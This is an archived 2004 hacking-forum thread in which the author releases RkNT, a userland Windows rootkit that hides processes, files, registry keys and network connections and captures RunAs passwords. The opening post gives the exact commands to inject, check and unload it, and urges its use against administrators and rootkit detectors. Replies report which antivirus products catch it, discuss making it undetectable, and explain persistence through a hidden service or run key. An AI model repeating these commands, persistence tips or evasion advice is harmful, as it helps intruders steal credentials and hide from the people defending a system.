|=----------=[ RkNT 1.0 : The Real NT Ring3 Infection ]=-----------=| |=-----------------------------------------------------------------=| |=------------=[ R-e-D of RedKod <r-e-d@redkod.com> ]=-------------=|
, , /( )` \ \___ / | /- _ `-/ ' (/\/ \ \ /\ / / | ` \ O O ) / | `-^--'`< ' (_.) _ ) / `.___/` / `-----' / <----. __ / __ \ R 0 0 T K I T <----|=====O)))==) \) /==== <----' `--' `.__,' \ | | \ / ______( (_ / \______ ,' ,-----' | \ `--{__________) \/
This rootkit can not only hide process, files, or directories, or regkeys or connections, but also retrieve NT passwords or forbids deletion of misc files, from windows explorer or from MS-DOS command line (cmd.exe). Files and directories are even hidden by those last Windows tools. They're also invisible for tlist.exe and WinTask PRO.
About connections, you can note that every port number over 65400 and under 65499 can't be seen within netstat.exe.;]
You can retrieve NT passwords by using the RunAs feature. The rootkit hooks the function to catch the given password. Passwords list is available in the file "%systemrootdir%\winini.sys".
Very Important, this rootkit completely runs in USERLAND (RING3), no kernel module is needed;]. This type of rootkit is more robust and is not detected by currents antivirus.
To Compile RkNTLoad: cd RkNTLoad nmake
To load the rootkit (take care to use the full path to the rootkit binary) c:\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l [*] explorer.exe => PID [1196] [*] DLL: c:\RkNT\RkNT.dll [*] Injection de la DLL. => Injection de la DLL effectuée avec succès.
Once the rootkit is running, every process, files, directories, registry keys whose names begins with '_' (underscore) are hidden !
You can check to see if it's running with this command: C:\RkNT>RkNTLoad -p explorer.exe -m | find "RkNT 0x00B60000 c:\RkNT\RkNT.dll
If you want to unload the rootkit just proceed like this: :\RkNT>RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -u [*] explorer.exe => PID [1196] [*] Récup?ration d'un handle sur la DLL chargée. => DLL trouvée ? l'adresse 0x00B60000. [*] Déchargement de la DLL en cours... => DLL d?chargée avec succès.
For remarks, questions you can contact me at r-e-d[at]redkod.com or get me on the RedKod forum : http://www.redkod.com/phorum/
-- R-e-D, RedKod Team r-e-d@redkod.com http://www.redkod.com/ http://r-e-d.redkod.com/ GnuPG v1.0.6 (GNU/Linux) ID 0x4D572372
Use it for your str0's against that agressive admins from these days! AND those F*KKING admins with rootkit detectors! enjoy peeps
Tyrano
Jul 9 2004, 06:52 AM
looks like it has some great features. now, how do we detect it
popo0421
Jul 9 2004, 08:31 AM
Thanks for share this rootkit ! and test it work ok!
shiz
Jul 9 2004, 08:32 AM
fprot antivirus detetcts it right away upon starting the download
shiz
Jul 9 2004, 08:43 AM
oops, doubleposted as per accident..
Lanig
Jul 9 2004, 11:36 AM
detected by kav too... but its open source wont be hard making it totally undetectable
jhd
Jul 9 2004, 11:42 AM
thx for the share
Killahbee
Jul 9 2004, 12:06 PM
intresting, lemme see
h3llraz0r
Jul 9 2004, 01:27 PM
looks great thanks for the rootkit! detected by f-secure also.
Venom
Jul 9 2004, 09:54 PM
Don't be surprised .. Not detected by McAfee as of now.
Can someone plz translate the comments in the code to english
jpno5
Jul 10 2004, 01:10 AM
has any1 got this 2 work. i compiled it ok and ran. the dll loads but its only folders and files it will hide, i can still view the procesees and regkeys and c the connection in netstat
blahplok
Jul 10 2004, 01:36 AM
thank's, fos sharing this rk, anyone can tell me where i can find ms_blaster source code?
kenshin_efx
Jul 10 2004, 04:35 AM
hummmm thabkz alot for share your toolz mand, i really to appreciate that.
jockel
Jul 11 2004, 08:36 PM
nice one .. thanks 4 distributing the source along with it...
globey
Jul 11 2004, 10:36 PM
its nice r00tkit dude. tnx for that.
tibbar
Jul 12 2004, 07:23 AM
well thats very useful. thanx.
btw use alternative compilers to make it undetected
Mux99
Jul 12 2004, 12:02 PM
Hey nice rootkit.... with really nice options.
I will try to modd the surce...
Thx for sharing !
Jimbras
Jul 13 2004, 01:41 PM
Thanks for this. gonna check it out
michael
Jul 13 2004, 02:17 PM
k...thx for sharing i tried it ..seems to work but i dont get the "underline" thing... " _ " those should be invisible but when i do fport i can still see my blabla.exe running so i should rename my blabla.exe to _blabla.exe...right?
am i doing something wrong here ?!!?
winxpdll
Jul 13 2004, 05:16 PM
Awesome ! Thanks A LOT for distributing the source code... Pls add this mod 4 simplify configuration :
CODE
#define HIDE_FILE_MASK "_" ..... //mod : if (filename[0] == '_') if (filename[0] == HIDE_FILE_MASK ) return TRUE; ......
...or something like this.
[Z]castor
Jul 13 2004, 08:29 PM
thanx sharing that nice rootkit
braini
Jul 14 2004, 07:52 AM
QUOTE (michael @ Jul 13 2004, 02:17 PM)
k...thx for sharing i tried it ..seems to work but i dont get the "underline" thing... " _ " those should be invisible but when i do fport i can still see my blabla.exe running so i should rename my blabla.exe to _blabla.exe...right?
am i doing something wrong here ?!!?
or u just modify the sozurce and compile a dll for your needs / files....
shouldnt be that hard
predx
Jul 14 2004, 02:21 PM
hey thanks for posting this rootkit!!!
macca
Jul 14 2004, 11:38 PM
thankyou, for this new piece of s/w, i will have something diff to test out... much appreciated ..
also not reported by mcafee with latest definitions..
globey
Jul 14 2004, 11:56 PM
i have to run the rootkit with this command?
CODE
RkNTLoad -p explorer.exe -d c:\RkNT\RkNT.dll -l
or i can choos another -p? like:
CODE
RkNTLoad -p GSO.exe -d c:\RkNT\RkNT.dll -l
or something like that.?
and i need to run the rootkit one time? or every time the computer is rebooted?
strohunter
Jul 15 2004, 12:47 AM
you can inject every process you want with the dll it will be rootkited, but, you will need the inject every process you want to be rootkited. its not very usefull is it ? ^^
if you inject explorer.exe, each new created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll, this fonction has been of course hooked to automatically inject each new created process.
and yes you will need to run the rootkit each time the computer reboot ^^
globey
Jul 15 2004, 10:16 AM
QUOTE (strohunter @ Jul 15 2004, 12:47 AM)
you can inject every process you want with the dll it will be rootkited, but, you will need the inject every process you want to be rootkited. its not very usefull is it ? ^^
if you inject explorer.exe, each new created process will be automatically injected, since a process is created by explorer.exe calling CreateProcessW from kernel32.dll, this fonction has been of course hooked to automatically inject each new created process.
and yes you will need to run the rootkit each time the computer reboot ^^
so its not the best root kit :\
tnx for the answer
strohunter
Jul 15 2004, 09:12 PM
QUOTE (globey @ Jul 15 2004, 10:16 AM)
so its not the best root kit :\
tnx for the answer
what ?
injected the dll in explorer.exe is the only (proper) way to have any process automatically rootkited with a pure userland rootkit (well as i know...) mine work in a very similirar way.
about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s
braini
Jul 16 2004, 06:49 AM
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)
about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s
especially when u can hide registry keys ;]
strohunter
Jul 16 2004, 08:56 AM
QUOTE (braini @ Jul 16 2004, 06:49 AM)
QUOTE (strohunter @ Jul 15 2004, 09:12 PM)
about the *reboot* problem, its just your job to make it as a system service, or a "run regkey", and its not quite difficult :s
especially when u can hide registry keys ;]
yep ^__^ (but i prefer system service, to give the rootkit/backdoor, nt authority rights)
espey
Jul 16 2004, 01:13 PM
Big thx this r00tkit is very usefull :]
passi
Jul 16 2004, 01:14 PM
Thanks for this one Very interesting!
ANTITRUST
Jul 16 2004, 03:44 PM
Following my test in remote, it functions very well Thank you for this rookit !
DougieShiney
Jul 18 2004, 06:04 PM
cheers for the source , code be easy to change and make none detectable version
t0bban
Jul 18 2004, 09:05 PM
I read about this somewhere.. Seems to kick arse.. Is it alright? Cheers.
z73
Jul 18 2004, 11:36 PM
this really looks like kicking ass. Worth a try thx for sharing
MxMx
Sep 12 2004, 07:43 AM
hey peeps,
ive tried it to compile but how to do this?..
ive tried it with the rknt.dll already in the package but still my folders beginning with _ are seeable
plz helpzor me
Gargoyle
Sep 14 2004, 09:01 PM
I started the Rootkit and injected the explorer.exe. but i can see folders oder files with "_". The explorer.exe seems not to be injected.
started with RkNTLoad -p explorer.exe -d RkNT.dll -l
what can be the problem ?
many thx
tonikgin
Sep 15 2004, 10:57 PM
QUOTE
You can retrieve NT passwords by using the RunAs feature. The rootkit hooks the function to catch the given password. Passwords list is available in the file "%systemrootdir%\winini.sys".
the winini.sys file idea needs more thought put into it. this filename itself is suspicious, and also searching for the file itself could be used to detect presence of this rootkit since the filename is unique to this version.
im guessing this isnt an open source project?
crosis
Sep 16 2004, 06:13 AM
wow nice thx
Sigmatador
Sep 16 2004, 12:14 PM
@Gargoyle use the full path of the dll: (ex: "c:\rknt.dll")
@tonikgin GNU GPL, and well commented (in french)
@all this release is a bunch of bug, wait the next release ^^
ivanchin99
Oct 2 2004, 10:39 AM
guys.. can any1 guide me into making this rootkit undetectable???
click
Oct 2 2004, 01:44 PM
Wow, thanks for the rootkit!
This should help me out quite a bit, especially with the source code. I am working on making a metasploit payload set that include rootkits, and a non-kernel driver rootkit would be perfect!
Thanks for the excellent post
elbarto95
Oct 2 2004, 04:07 PM
thanks for sharing
rgds
ivanchin99
Oct 3 2004, 09:06 AM
guys.. i need some guide here.. how do i make it err unique, undetectable..? izzit by disassemble it and reassemble it?? do i need programing skills for this?
im new to this kind of thing..
devil666
Oct 5 2004, 07:39 PM
Thanx For the rootkit...
Will have a try
{$ fireburn $}
Oct 6 2004, 06:59 AM
for me this rk is not so bad but hxdef si really better !!! for many thinx, like the disk size modification, et for the possibility to hide that we want, not only all begin by _
because, many exe aren't hexeditable, and so we can't modifi thet service name ...
belgther
Oct 6 2004, 02:59 PM
but a rootkit means nothing if there's not a shell server or sth. like that... or how does it work?
mogwai
Oct 7 2004, 01:53 PM
interesting... miam miam thanks for this soft :]
perky
Oct 7 2004, 03:48 PM
Thanks, Very good ! :-)
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
